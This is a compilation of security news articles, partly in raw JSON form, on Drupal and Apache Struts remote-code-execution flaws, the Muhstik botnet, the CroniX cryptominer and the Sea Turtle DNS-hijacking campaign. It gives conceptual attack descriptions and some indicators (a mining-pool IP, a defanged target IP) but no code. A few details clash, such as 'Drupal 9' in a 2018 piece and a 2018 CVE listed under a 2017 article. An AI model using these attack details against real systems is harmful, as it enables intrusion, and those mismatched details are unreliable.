[May](<https://threatpost.com/kitty-cryptomining-malware-cashes-in-on-drupalgeddon-2-0/131668/>), researchers at Imperva Incapsula found a cryptomining malware dubbed \u201ckitty\u201d targeting servers and browsers open to Drupalgeddon 2.0. 
Also, a [botnet](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>) dubbed Muhstik installs cryptocurrency miners and launches DDoS attacks via compromised systems. More recently, attackers behind a [ransomware attack](<https://threatpost.com/ransomware-attack-hits-ukrainian-energy-ministry-exploiting-drupalgeddon2/131373/>) hitting the Ukrainian Energy Ministry appear to have made use of the highly critical remote-code execution bug.\n\n\u201cThis latest cryptojacking campaign is yet another example of Drupal websites being exploited on a mass scale,\u201d Mursch said. \u201cIf you\u2019re a website operator using Drupal\u2019s content management system, you need to update to the latest available version ASAP.\u201d\n", "cvss3": {}, "published": "2018-06-05T18:24:29", "type": "threatpost", "title": "Drupalgeddon 2.0 Still Haunting 115K+ Sites", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2018-7600"], "modified": "2018-06-05T18:24:29", "id": "THREATPOST:1A7A6E9FF0F2A41A6A83EBDE0038383C", "href": "https://threatpost.com/drupalgeddon-2-0-still-haunting-115k-sites/132518/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-01-23T05:27:29", "description": "Drupal released a patch for a \u201chighly critical\u201d flaw in versions 6, 7 and 8 of its CMS platform that could allow an attacker to take control of an affected site simply by visiting it. Drupal also warned an unprivileged and untrusted attacker could modify or delete data hosted on affected CMS platforms.\n\nThe Drupal developers alert ([SA-CORE-2018-002](<https://groups.drupal.org/security/faq-2018-002>)) estimates over one million sites running Drupal are impacted. Affected are Drupal CMS versions before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1. 
Also impacted are Drupal 6 and the 8.3.x and 8.4.x releases, said Drupal.

“This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,” warned the MITRE Common Vulnerabilities and Exposures description ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)). There is no known public exploit code in the wild and no reports of the vulnerability being exploited.

The flaw is described as “an input validation issue where invalid query parameters could be passed into Drupal webpages,” said Tim Mackey, technology evangelist at Black Duck by Synopsys.

Meanwhile, several Drupal-specific hosting providers, such as Pantheon, Acquia, Platform.sh and Amazee.io, are offering platform-level solutions tied to the Web Application Firewall (WAF) layer or the way they are hosting the sites. Also, at least two security-oriented content delivery network services, CloudFlare and Fastly, have rolled out solutions to help protect customers.

“The only effective mitigation we are advising is to upgrade, or second best is to put a rule into a WAF,” said Greg Knaddison, a Drupal security team member and product engineer at Card.com.

Knaddison said it’s not exactly clear what portion of Drupal sites are vulnerable because it depends on what features are enabled or not. He said Drupal is not releasing any of the technical aspects of the vulnerability other than that the patch acts as an input filter on web page requests.

Mackey described the vulnerability as a flaw that allows unsanitized data to enter the Drupal data space. “Under such circumstances a malicious user could cause Drupal to return data which the page authors never intended to be presented on the given page. Since the vulnerability is present within the bootstrap process, the best mitigation model is to convert the Drupal site to a pure HTML site. Administrative and maintenance pages are similarly impacted due to the issue being present in the bootstrap process,” he said.

Knaddison said the vulnerability has to do with the way Drupal interprets a value that begins with a hash as having a special meaning. “Generally, input filtering like this is a blunt solution to the problem and not fixing the specific vulnerable code. But it gets rid of all kinds of input that might be a problem for code later in the code base,” he said.

Knaddison said there are a number of strong indicators that Drupal users are getting a jump on patching. He estimates “hundreds of thousands” of sites immediately patched within the first 12 hours after the patches were released. “I think that with this release, we will see a very fast update rate because it just seems like everybody was really prepared to update within hours of the release,” he said. Last week, [Drupal forewarned](<https://threatpost.com/drupal-forewarns-highly-critical-bug-to-be-patched-next-week/130733/>) of Wednesday’s release of a highly critical patch.

According to an analysis of Drupal sites by the firm SiteLock, only 18 percent of Drupal websites were found to be running the latest core updates. “This means that the vast majority of websites running Drupal are likely vulnerable to compromise because they are not being updated with the latest security patches,” according to the company.

Source: Threatpost, published 2018-03-29. CVEs: CVE-2018-7600. CVSS: 7.5 (AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/). <https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>

### Critical RCE Bugs Patched in Drupal 7 and 8

Drupal is urging users to upgrade to the latest release that fixes two critical remote code execution bugs impacting Drupal 7 and Drupal 8. Developers have also identified three additional “moderately critical” vulnerabilities.

“A remote attacker could exploit some of these vulnerabilities to take control of an affected system,” according to a security bulletin [posted](<https://www.us-cert.gov/ncas/current-activity/2018/10/18/Drupal-Releases-Security-Updates>) by the United States Computer Emergency Readiness Team (US-CERT).

The critical bugs, disclosed this week, include an injection vulnerability in the default Drupal mail backend, which uses PHP’s mail function [DefaultMailSystem::mail()] in Drupal 7 and 8.

One of the critical vulnerabilities is tied to the “DefaultMailSystem::mail()” component in Drupal 7 and 8. When using this default mail system to send emails, some variables were not being sanitized for shell arguments, according to a separate [advisory](<https://www.drupal.org/sa-core-2018-006>) released by the Drupal developer community.
When untrusted input is not sanitized correctly, that could lead to remote code execution.

This glitch was reported by security researcher and senior web developer [Damien Tournoud](<https://www.drupal.org/user/788032>) with Princeton University.

A second remote code execution bug, reported by Nick Booher, exists in Drupal 9’s Contextual Links module. In Drupal, these modules supply contextual links that allow privileged users to quickly perform tasks related to regions of the page – without having to navigate to the Admin Dashboard.

However, the Contextual Links module doesn’t sufficiently validate the requested contextual links. That means that an attacker could launch a remote code execution attack through these links.

One upside is that an attacker would need certain existing permissions: “this vulnerability is mitigated by the fact that an attacker must have a role with the permission ‘access contextual links,’” Drupal said.

Drupal also acknowledged three other “moderately critical” bugs in its advisory.

The first is an access bypass bug in the content moderation tool in Drupal 8. Essentially, in some conditions, content moderation fails to check a user’s access to use certain transitions – potentially allowing access bypass.

Another, an open redirect vulnerability in Drupal 7 and 8, allows external URL injection through URL aliases.

The path module allows users with the ‘administer paths’ permission to create pretty URLs for content – and that means that “In certain circumstances the user can enter a particular path that triggers an open redirect to a malicious url,” Drupal said.

The issue is mitigated by the fact that the user needs the administer paths permission to exploit it, Drupal said.

Finally, a “moderately critical” bug in Drupal’s redirect process allows bad actors to trick users into visiting third-party websites.

According to Drupal, Drupal core and contributed modules frequently use a “destination” query string parameter in URLs to redirect users to a new destination after completing an action on the current page.

“Under certain circumstances, malicious users can use this parameter to construct a URL that will trick users into being redirected to a 3rd party website, thereby exposing the users to potential social engineering attacks,” said Drupal.

All bugs were fixed, and Drupal advised users to upgrade to the most recent version of Drupal 7 or 8 core.

“Minor versions of Drupal 8 prior to 8.5.x are not supported and do not receive security coverage, so sites running older versions should update to the above 8.5.x release immediately. 8.5.x will receive security coverage until May 2019,” the company said.

Drupal has had a run through the mill when it comes to vulnerabilities this year, in particular dealing with a flaw ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) in [March](<https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>) impacting versions 6, 7, and 8 of Drupal’s CMS platform, which impacted over one million sites running Drupal.

Source: Threatpost, published 2018-10-20. CVEs: CVE-2018-7600. CVSS: 7.5 (AV:N/AC:L/Au:N/C:P/I:P/A:P). <https://threatpost.com/two-critical-rce-bugs-patched-in-drupal-7-and-8/138468/>

### Record Oracle Patch Update Addresses ShadowBrokers, Struts 2 Vulnerabilities

Oracle released its biggest [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html>) ever on Tuesday, and with it came added urgency in the form of patches for the Solaris vulnerabilities exposed by the [ShadowBrokers](<https://threatpost.com/shadowbrokers-expose-nsa-access-to-swift-service-bureaus/124996/>) last week, as well as the recent [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), also under public attack.

In all, Oracle admins have a tall order with 299 patches across most of the company’s product lines; 162 of the vulnerabilities are remotely exploitable.

Two Solaris exploits were leaked by the mysterious ShadowBrokers last Friday.
The Solaris attacks were included among a rash of other exploits, including a laundry list of Windows attacks, many of which had [already been patched by Microsoft](<https://threatpost.com/shadowbrokers-windows-zero-days-already-patched/125009/>) prior to last Friday’s dump.

One of the Solaris vulnerabilities, code-named EBBISLAND, had been patched in a number of updates dating back to 2012. The other, EXTREMEPARR, was addressed on Tuesday. It affects Solaris 7-10 on x86 and SPARC architectures, and is a local privilege escalation issue in the [dtappgather](<https://github.com/HackerFantastic/Public/blob/master/exploits/dtappgather-poc.sh>) component. Oracle patched versions 10 and 11.3 on Tuesday.

Researcher Matthew Hickey of U.K. consultancy Hacker House said the EXTREMEPARR attacks go back to Solaris 7, while EBBISLAND affects Solaris 6-10 and is a remote RPC services exploit. Both exploits allow attackers to elevate privileges to root and run shells on a compromised server.

> I said in December that EBBISLAND was likely an exploit for Solaris 6 through 10, I am today confirmed correct (upto 9, still untested) <https://t.co/A3fC7BuwcK>
>
> — Hacker Fantastic (@hackerfantastic) [April 8, 2017](<https://twitter.com/hackerfantastic/status/850802122224488452>)

“As a security researcher it was an extremely interesting find to discover such well written exploits in a public data dump,” Hickey wrote in a [report](<https://www.myhackerhouse.com/easter-egg-hunt_greetz/#sthash.YMmAy8Ez.dpuf>) published today, “even though the bug was a trivial path traversal for ‘dtappgather’ extensive steps had been taken to protect the attack specifics in the binary and a well tested tool which worked flawlessly on all tested hosts was included.”

Since last August, the ShadowBrokers have periodically released tools belonging to the Equation Group, widely believed to be the U.S. National Security Agency. The Solaris attacks are of particular concern since these systems are the backbone of many enterprise-grade server environments.

> The NSA had the power to hack any Oracle Solaris box in the world via UDP/TCP generically with anti-forensics capabilities and its public.
>
> — Hacker Fantastic (@hackerfantastic) [April 10, 2017](<https://twitter.com/hackerfantastic/status/851561358516736000>)

“This vulnerability can be exploited remotely without authentication or any information about the targeted machine,” said Amol Sarwate, director of [Qualys Vulnerability Labs](<https://blog.qualys.com/laws-of-vulnerabilities/2017/04/18/oracle-plugs-struts-hole-along-with-299-total-vulnerabilities>). “These are very critical vulnerabilities.”

The [Apache Struts 2 vulnerability](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>) has been public since early March, though it’s been publicly exploited for much longer. The flaw is in the Jakarta Multipart parser in Struts 2 2.3 before 2.3.32 and in 2.5 before 2.5.10.1. A remote attacker could upload a malicious Content-Type value and have it execute. Public scans and attacks ramped up immediately upon disclosure of the issue and development of a Metasploit module. For the most part, Linux-based DDoS bots were behind most of the exploit attempts, but a spate of attacks was detected attempting to install [Cerber ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) on vulnerable Windows servers.

Oracle patched Struts 2 in 25 of its products, including 19 different instances of its Oracle Financial Services Applications. Most of these Oracle applications, however, are not internet-facing and live behind an enterprise firewall.

“That could be a little bit of a saving grace for some of these services,” Qualys’ Sarwate said. There could be some instances, however, where these apps are exposed to the public network for remote administration purposes, for example. There are also some cases in which admins may be learning for the first time that Struts 2 is running inside an Oracle product. “For a normal admin, it could be a little difficult unless a vendor tells them these are the products you’re running that are affected by the Struts 2 vulnerability. It could take some admins by surprise.”

While there were 47 patches in total for the financial applications suite, the MySQL database also received a hefty load of 39 fixes, 11 of which are remotely exploitable without authentication. The Oracle Retail Applications suite also had 39 vulnerabilities addressed, 32 of which were remotely exploitable. Oracle Fusion Middleware received 31 patches, 20 of which were for remotely exploitable vulnerabilities.

The previous record for quarterly Oracle patches was last July, when [276 patches](<https://threatpost.com/oracle-patches-record-276-vulnerabilities-with-july-critical-patch-update/119373/>) were released; January’s update, the first for 2017, had [270 patches](<https://threatpost.com/oracle-patches-270-vulnerabilities-in-years-first-critical-patch-update/123155/>).

Source: Threatpost, published 2017-04-19 (updated 2017-04-21). CVEs: CVE-2017-5638, CVE-2018-11776. CVSS: 10.0 (AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/). <https://threatpost.com/record-oracle-patch-update-addresses-shadowbrokers-struts-2-vulnerabilities/125046/>

### Apache Struts 2 Flaw Uncovered: ‘More Critical Than Equifax Bug’

A critical remote code-execution vulnerability in Apache Struts 2, the popular open-source framework for
developing web applications in the Java programming language, is threatening a wide range of applications, even when no additional plugins have been enabled. Successful exploitation could lead to full endpoint and eventually network compromise, according to researchers – who said that the flaw is more dangerous than the similar vulnerability used to compromise Equifax last year.

A [working exploit](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) surfaced within a day of its disclosure.

The vulnerability ([CVE-2018-11776](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11776>)) was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-057>) by the Apache Software Foundation yesterday and affects all supported versions of Struts 2: Users of Struts 2.3 should upgrade to 2.3.35; users of Struts 2.5 need to upgrade to 2.5.17. They should do so as soon as possible, given that bad actors are likely already working on exploits, according to the Semmle research team’s Man Yue Mo, who uncovered the flaw.

“This vulnerability affects commonly-used endpoints of Struts, which are likely to be exposed, opening up an attack vector to malicious hackers,” he said in a [posting](<https://semmle.com/news/apache-struts-CVE-2018-11776>) on Wednesday. “On top of that, the weakness is related to the Struts Object-Graph Navigation Language (OGNL) language, which hackers are very familiar with, and are known to have been exploited in the past.”

[OGNL](<https://commons.apache.org/proper/commons-ognl/>) is a powerful, domain-specific language that is used to customize Struts’ behavior.

“On the whole, this is more critical than the highly critical Struts RCE vulnerability that the Semmle Security Research Team discovered and announced last September,” said Yue Mo, referring to the infamous vuln (CVE-2017-9805) that hackers used to compromise Equifax last year, which led to the lifting of [personal details of 147 million consumers](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>).

Tim Mackey, technology evangelist at Synopsys, told Threatpost that this is due to the fact that it affects a wider swath of the Struts architecture.

“In the case of CVE-2018-11776, the root cause [is] a lack of input validation on the URL passed to the Struts framework,” he explained. “The prior [Struts] vulnerabilities were all in code within a single functional area of the Struts code. This meant that developers familiar with that functional area could quickly identify and resolve issues without introducing new functional behaviors. CVE-2018-11776 operates at a far deeper level within the code, which in turn requires a deeper understanding of not only the Struts code itself, but the various libraries used by Struts. It is this level of understanding which is of greatest concern – and this concern relates to any library framework.”

#### Anatomy of the Flaw

The vulnerability is caused by insufficient validation of untrusted user data in the core of the Struts framework, according to the team’s findings.

“Attackers can attack vulnerable applications by injecting their own namespace as a parameter in an HTTP request,” they explained. “The value of that parameter is insufficiently validated by the Struts framework, and can be any OGNL string.”

Because the issue affects the core of Struts, there are at least two separate attack vectors – and potentially many more.

In the first attack scenario, three Struts result types are unsafe when used without a namespace, as defined either in the Struts configuration file or in Java code if the Struts Convention plugin is used. These are the redirect action, which redirects the visitor to a different URL; action chaining, which is a method to chain multiple actions into a defined sequence or workflow; and the postback result, which renders the current request parameters as a form which immediately submits a postback to the specified destination chain or postback.

The researchers explained: “An example of a struts.xml configuration that is potentially vulnerable: the `<action …>` tag does not have a namespace attribute and contains a result of type redirectAction. If you use the Struts Convention plugin, you will also have to look for actions and results that are configured using Java code.”

The second attack vector has to do with the fact that Struts supports page templates inside `<result>` tags in the Struts configuration: “The use of URL tags in such pages is potentially unsafe if the template is referred to from an `<action>` tag that does not provide a namespace attribute (or specifies a wildcard namespace),” the researchers said. “Your application is vulnerable if the template contains an `<s:url …>` tag without an action or value attribute.”

Researchers noted that for an exploit for either of the known vectors to be successful, an application must have the alwaysSelectFullNamespace flag set to “true” in the Struts configuration – a default state if the application uses the popular Struts Convention plugin. Also, the application’s actions must be configured without specifying a namespace, or with a wildcard namespace (e.g. “/*”).

“This applies to actions and namespaces specified in the Struts configuration file (e.g. `<action namespace="main">`), but also to actions and namespaces specified in Java code if you are using the Struts Convention plugin,” they explained.

That said, they also cautioned that other attack vectors may emerge that apply to different configurations.

“Whether or not a Struts application is vulnerable to remote code execution largely depends on the exact configuration and architecture of the application,” the firm said. “Note that even if an application is currently not vulnerable, an inadvertent change to a Struts configuration file may render the application vulnerable in the future. You are therefore strongly advised to upgrade your Struts components, even if you believe your configuration not to be vulnerable right now.”

This is a critical point, according to Mackey. “Validating the input to a function requires a clear definition of what is acceptable,” he said. “It equally requires that any functions available for public use document how they use the data passed to them. Absent the contract such definitions and documentation form, it’s difficult to determine if the code is operating correctly or not. This contract becomes critical when patches to libraries are issued, as it’s unrealistic to assume that all patches are free from behavioral changes. Modern software is increasingly complex and identifying how data passes through it should be a priority for all software development teams.”

Pavel Avgustinov, vice president of QL Engineering at Semmle, laid out what’s at stake in a media statement: “Critical remote code-execution vulnerabilities like the [one that affected Equifax](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>) and the one we announced [this week] are incredibly dangerous for several reasons: Struts is used for publicly-accessible customer-facing websites, vulnerable systems are easily identified, and the flaw is easy to exploit,” he said. “A hacker can find their way in within minutes, and exfiltrate data or stage further attacks from the compromised system. It’s crucially important to update affected systems immediately; to wait is to take an irresponsible risk.”

Source: Threatpost, published 2018-08-23. CVEs: CVE-2017-9805, CVE-2018-11776. CVSS: 9.3 (AV:N/AC:M/Au:N/C:C/I:C/A:C). <https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>

### Muhstik Botnet Exploits Highly Critical Drupal Bug

Researchers are warning a recently discovered and highly critical vulnerability found in Drupal’s CMS platform is now being actively exploited by hackers who are using it to install cryptocurrency miners and to launch DDoS attacks via compromised systems. At the time of the disclosure, last month, researchers said they were not aware of any public exploits.

Now Netlab 360 researchers say they have identified a botnet, dubbed Muhstik, that is taking advantage of the Drupal bug.
They said multiple scans on infected Drupal instances reveal [attackers](<https://blog.netlab.360.com/botnet-muhstik-is-actively-exploiting-drupal-cve-2018-7600-in-a-worm-style-en/>) are exploiting the vulnerability by accessing a URL and then injecting exploit code. The technique allows adversaries to execute commands on targeted servers running Drupal.

The Muhstik botnet exploits a Drupal vulnerability ([CVE-2018-7600](<https://groups.drupal.org/security/faq-2018-002>)) impacting versions 6, 7, and 8 of Drupal’s CMS platform. “This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being completely compromised,” warned MITRE’s Common Vulnerabilities and Exposures bulletin on March 28.

Drupal, which also released a patch for the vulnerability in [March](<https://threatpost.com/drupal-issues-highly-critical-patch-over-1m-sites-vulnerable/130859/>), warned that over one million sites running Drupal are impacted. Unprivileged and untrusted attackers could also modify or delete data hosted on affected CMS platforms, Drupal said.

After further investigation, Netlab researchers said they believe at least three groups of malware were exploiting the vulnerability.

“We noticed one of them has worm-propagation behavior. After investigation, we believe this botnet has been active for quite a time. We name it Muhstik, for this keyword keeps popping up in its binary file name and the communication IRC channel,” wrote Netlab 360 researchers.

According to Netlab, Muhstik is a variant of Tsunami, a malware strain that creates botnets with infected Linux servers and Linux-based IoT devices.

Muhstik has the capability to install two coinminers – XMRig (XMR) and CGMiner – to mine the open-source, peer-to-peer Dash cryptocurrency, according to Netlab.

Researchers say the botnet uses the open-source XMRig utility to mine cryptocurrency with a self-built mining pool (47.135.208.145:4871). Meanwhile, it uses the popular mining software CGMiner to dig cryptocurrency coins using multiple mining tools (with username reborn.D3), they said.

In addition, Netlab researchers said they intercepted multiple DDoS attack instructions targeting the IP address 46[.]243[.]189[.]102.

Muhstik relies on 11 command and control domains and IP addresses, and the attackers also use the IRC communication protocol to invoke commands for the botnet: “We observed multiple IRC Channels, all starting with ‘muhstik,’” said Netlab researchers in a report. “At present, we can not confirm which specific channels are open on which C2 server. This is due to the characteristics of the IRC protocol itself. Only when we receive a communication instruction from the corresponding channel can we confirm it’s present.”

Muhstik also has capabilities to scan for vulnerable server apps using the aiox86 scanning module. This module “scans TCP port 80, 8080, 7001, 2004, and tries varieties of different payloads on each port,” according to NetLab.

GreyNoise Intelligence said in a tweet that it detected the botnet exploiting a vulnerability (CVE-2017-10271) in Oracle WebLogic Server as well, indicating that Muhstik is exploiting vulnerabilities in other server applications.

> UPDATE: there is a 95% overlap between the IPs scanning for the previously reported [#drupalgeddon](<https://twitter.com/hashtag/drupalgeddon?src=hash&ref_src=twsrc%5Etfw>) vulnerability and the Oracle CVE-2017-10271 vulnerability.
>
> — GreyNoise Intelligence (@GreyNoiseIO) [April 18, 2018](<https://twitter.com/GreyNoiseIO/status/986458691787517952?ref_src=twsrc%5Etfw>)

Troy Mursch, founder of Bad Packets Report, told Threatpost that given the criticality of the exploit and the repercussions once it’s used, “the race is on to find vulnerable Drupal installations.”

“I recommend affected users update to Drupal 7.58 or 8.5.1 as soon as possible. To note as well, updating to the patched version doesn’t retroactively ‘unhack’ your site. I recommend website operators check their installation (server) for any of the IoCs mentioned in the 360 Netlab report after completing the update,” he said.

Source: Threatpost, published 2018-04-23. CVEs: CVE-2017-10271, CVE-2018-7600. CVSS: 7.5 (AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/). <https://threatpost.com/muhstik-botnet-exploits-highly-critical-drupal-bug/131360/>

It was only a matter of time before attacks were seen in the wild, and now it’s happened.
A known threat actor has mounted a large cryptomining campaign using the recently disclosed Apache Struts 2 critical remote code-execution vulnerability. It uses a new malware designed for persistence and stealth, dubbed CroniX.\n\nThe malware\u2019s snappy name comes from the fact that it uses the Cron tool for persistence and Xhide for launching executables with fake process names, according to researchers at F5 Labs, who analyzed the campaign.\n\nThe Apache Struts 2 namespace vulnerability ([CVE-2018-11776](<https://threatpost.com/apache-struts-2-flaw-uncovered-more-critical-than-equifax-bug/136850/>)) was disclosed just two weeks ago by researchers at Semmle. Researchers have warned that it has the potential to open the door to even more critical havoc than the bug at the root of the [infamous Equifax breach](<https://threatpost.com/equi-facts-equifax-clarifies-the-numbers-for-its-massive-breach/131797/>), which was also an Apache Struts 2 flaw ([CVE-2017-5638](<https://threatpost.com/equifax-confirms-march-struts-vulnerability-behind-breach/127975/>)). That\u2019s quite a statement given that the attack resulted in the exposure of personally identifiable information (PII) of 147 million consumers, costing the Fortune 500 credit-reporting company more than $439 million in damages and leading to the resignation of several of its executives.\n\nThe new campaign makes use of one of the [proof-of-concept exploits](<https://threatpost.com/poc-code-surfaces-to-exploit-apache-struts-2-vulnerability/136921/>) that were published on Github2 and Twitter just days after the latest flaw was publicized. 
Adversaries are using it to gain unauthenticated remote code-execution capabilities on targeted Linux machines in order to install a [Monero cryptomining script](<https://threatpost.com/?s=monero>), F5 researchers said.\n\n\u201cAs with many other Apache Struts 2 vulnerabilities, CVE-2018-11776 allows attackers to inject Object-Graph Navigation Language (OGNL) expressions, which might contain malicious Java code that is evaluated under several circumstances,\u201d the team explained in [a posting](<https://www.f5.com/labs/articles/threat-intelligence/apache-struts-2-vulnerability--cve-2018-11776--exploited-in-cron>) Tuesday. \u201cThis time, the injection point is within the URL. The attacker sends a single HTTP request while injecting an OGNL expression that, once evaluated, executes shell commands to download and execute a malicious file.\u201d\n\nThey added, \u201cconsidering it\u2019s only been two weeks since this vulnerability was discovered, it\u2019s worth noting how fast attackers are weaponizing vulnerabilities and how quickly researchers are seeing them in the wild.\u201d\n\n**Analysis**\n\nTaking a closer look at the malware, the team saw the malware downloads a file called \u201cH,\u201d which turns out to be an old XHide tool for launching executables with a fake process name, the researchers said. In this case, it launches a fork of the XMRig Monero miner, with an embedded configuration (pool, username and password), while changing the process name to the more innocuous-sounding \u201cjava.\u201d\n\nThe analysts also saw that three Cron jobs are used for persistence, with two of them refreshing the backdoor every day with downloads from the C2 server. Another job downloads a daily file named \u201canacrond,\u201d which saves itself in various Cron job files around the system. 
In all three cases, the scripts are used to connect to the C2 server and download the deployment bash script to restart the mining process; older versions of the scripts are then deleted off the system.

CroniX is also competitive malware, locating and deleting the binaries of any previously installed cryptominers so as to claim all of the CPU resources for itself, F5 found.

"For some miners, the attacker decides to take a more careful approach and check each process name and process CPU usage, and then kill only those processes that utilize 60 percent or more of the CPU resources," F5 researchers said. "This is probably done to avoid killing legitimate processes as the names of these miners (crond, sshd and syslogs) typically relate to legitimate programs on a Linux system."

Comparing the modus operandi of the operation, F5 researchers believe the actor is the same group that was behind a previous campaign exploiting Jenkins servers via [CVE-2017-1000353](<https://devcentral.f5.com/articles/jenkins-unsafe-deserialization-vulnerability-cve-2017-1000353-30142>). That campaign was uncovered two months ago.

"The malware deployment pattern…similar deployed file names and the quite unique usage of the XHide process-faker made us believe that the threat actor behind the exploitation of this fresh Struts 2 vulnerability is the same one," researchers noted in the analysis.

One difference is that in the previous campaign, the threat actor used a Chinese Git website to host malicious files.
Here, the attackers are using a dedicated web server hosted in the U.S., along with domain names under the .pw top-level domain of the Pacific island nation of Palau – believed registered by a Russian registrant.

While cryptomining can be seen as less destructive than [wiper malware,](<https://threatpost.com/secrets-of-the-wiper-inside-the-worlds-most-destructive-malware/131836/>) [ransomware](<https://threatpost.com/apache-struts-2-exploits-installing-cerber-ransomware/124844/>) or Equifax-like [mass data exfiltration](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) (all of which can be carried out using this flaw), Jeannie Warner, security manager at WhiteHat Security, noted that exploit development tends to be faster for more widely embedded flaws, highlighting the importance of patching this particular issue immediately.

"Apache Struts is used by some of the world's largest companies," she said via email. "The more common the vulnerability, the more it helps attackers simplify their process…and the easier it becomes for non-skilled hackers to compromise more websites. Methods to exploit this newest Struts vulnerability are already available online, so it is absolutely critical that all companies implement the patch immediately. There's no time to waste."

More attacks should be anticipated; in fact, while Linux machines seem to be the target for this particular CroniX effort, the F5 analysis uncovered an additional file lurking on the server that seems tailored to Microsoft's OS.

"[The file] at /win/checking-test.hta holds a Visual Basic script that calls a Microsoft Windows cmd to run a PowerShell command on a targeted victim," researchers said.
"So, it seems this threat actor is targeting Windows OS (not just Linux) using another operation hosted on the same server."

Source: Threatpost, "Active Campaign Exploits Critical Apache Struts 2 Flaw in the Wild," published 2018-09-05, <https://threatpost.com/active-campaign-exploits-critical-apache-struts-2-flaw-in-the-wild/137207/>. CVEs referenced: CVE-2017-1000353, CVE-2017-5638, CVE-2018-11776. CVSS v2 10.0 (AV:N/AC:L/Au:N/C:C/I:C/A:C).

---

A newly-discovered state-sponsored campaign is targeting national security organizations across the Middle East and North Africa (MENA) – and elsewhere – with domain name system (DNS) hijacking attacks, used to scoop up credentials.

The campaign, dubbed "Sea Turtle" by the Cisco Talos researchers who discovered it, began as early as January 2017 and has continued through the first quarter of 2019.

At least 40 different organizations across 13 countries have been compromised so far by the campaign; in addition to the MENA victims, secondary targets, including telecom firms, ISPs and DNS registrars, are being targeted in the U.S.
and Sweden.

Researchers in a [Wednesday analysis](<https://blog.talosintelligence.com/2019/04/seaturtle.html>) said that the attackers behind the campaign have the capabilities and sophistication to grow: "While this incident is limited to targeting primarily national security organizations in the Middle East and North Africa, and we do not want to overstate the consequences of this specific campaign, we are concerned that the success of this operation will lead to actors more broadly attacking the global DNS system," they said.

## The Campaign

The campaign has been utilizing DNS hijacking attacks, a type of attack in which an adversary redirects traffic meant for a legitimate website to a malicious server – meaning that they can easily harvest website credentials and other sensitive data that users submit through web forms and the like.

Since 2017, more than 40 firms have been compromised by the Sea Turtle attacks – including national security organizations, ministries of foreign affairs and prominent energy organizations; and telecom firms, internet service providers (ISPs) and DNS registrars. That includes companies like consulting firm [Cafax](<http://www.cafax.se/Home.html>) and DNS registry [NetNod,](<https://www.netnod.se/news/statement-on-man-in-the-middle-attack-against-netnod>) which have both released public statements on the attacks.

[Image](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/17123213/image1.jpg>)

In addition to these types of targets, researchers said the campaign represents the first known case of a domain name registry organization that was compromised for cyber-espionage operations. A domain name registry manages different parts of the domain namespace, such as country code top-level domains and generic top-level domains.
Compromising a domain name registry allows attackers to access the DNS logs, and highlights the sophistication of the attackers, researchers said.

The campaign has been "highly successful," researchers said, in part because the attacker employed DNS hijacking and redirection attacks to access targeted networks, and traditional security products aren't designed to monitor DNS requests. "The threat actors were able to achieve this level of success because the DNS domain space system added security into the equation as an afterthought," researchers said.

## The Attacks

The attackers gained initial access either through spear-phishing emails or through exploiting known flaws.

The phishing emails were aimed at registrants and used to gain their credentials. From there, the bad actors could access an organization's DNS records with the registrant's credentials.

Alternatively, they exploited known vulnerabilities – including a PHP code injection flaw in phpMyAdmin (CVE-2009-1151), a remote code-execution flaw in the Cisco Integrated Services Router 2811 (CVE-2017-6736) and the infamous "Drupalgeddon" remote code-execution Drupal bug (CVE-2018-7600).

A list of CVEs used by the attacker is in the image below – but researchers say that they believe the list is incomplete and "the actor in question can leverage known vulnerabilities as they encounter a new threat surface."

[Image](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/04/17123327/Screen-Shot-2019-04-17-at-12.03.19-PM.png>)

Once they gained access to a network, an attacker would access the DNS registry and modify the name server records for targeted firms, pointing users to a malicious DNS server that provided actor-controlled responses to all DNS queries – allowing them to trick users into giving up their credentials.

"The amount of time that the targeted DNS record was hijacked can range from a couple of minutes
to a couple of days," researchers said. "This type of activity could give an attacker the ability to redirect any victim who queried for that particular domain around the world."

The threat actors also used an array of techniques to evade detection, researchers said.

For instance, once users entered their credentials into impersonated services, the credentials would then be passed to the legitimate service, so the users couldn't tell that anything was wrong.

Attackers also used an interesting technique called certificate impersonation, in which attackers obtained a certificate authority-signed X.509 certificate from another provider for the same domain, imitating the one already used by the targeted organization – making the malicious site appear legitimate to the web browser.

## Other Campaigns

Researchers said that they assess with high confidence that the hijacking attacks are being launched by an advanced, state-sponsored actor looking to access sensitive networks and systems – but stayed mum on who exactly that actor was.

"This is the first time Cisco Talos is documenting operations conducted by this threat actor," Craig Williams, director of Talos Outreach at Cisco, told Threatpost.
"While we assess with high confidence that this activity was carried out by an advanced, state-sponsored actor, we defer to law enforcement officials on establishing attribution."

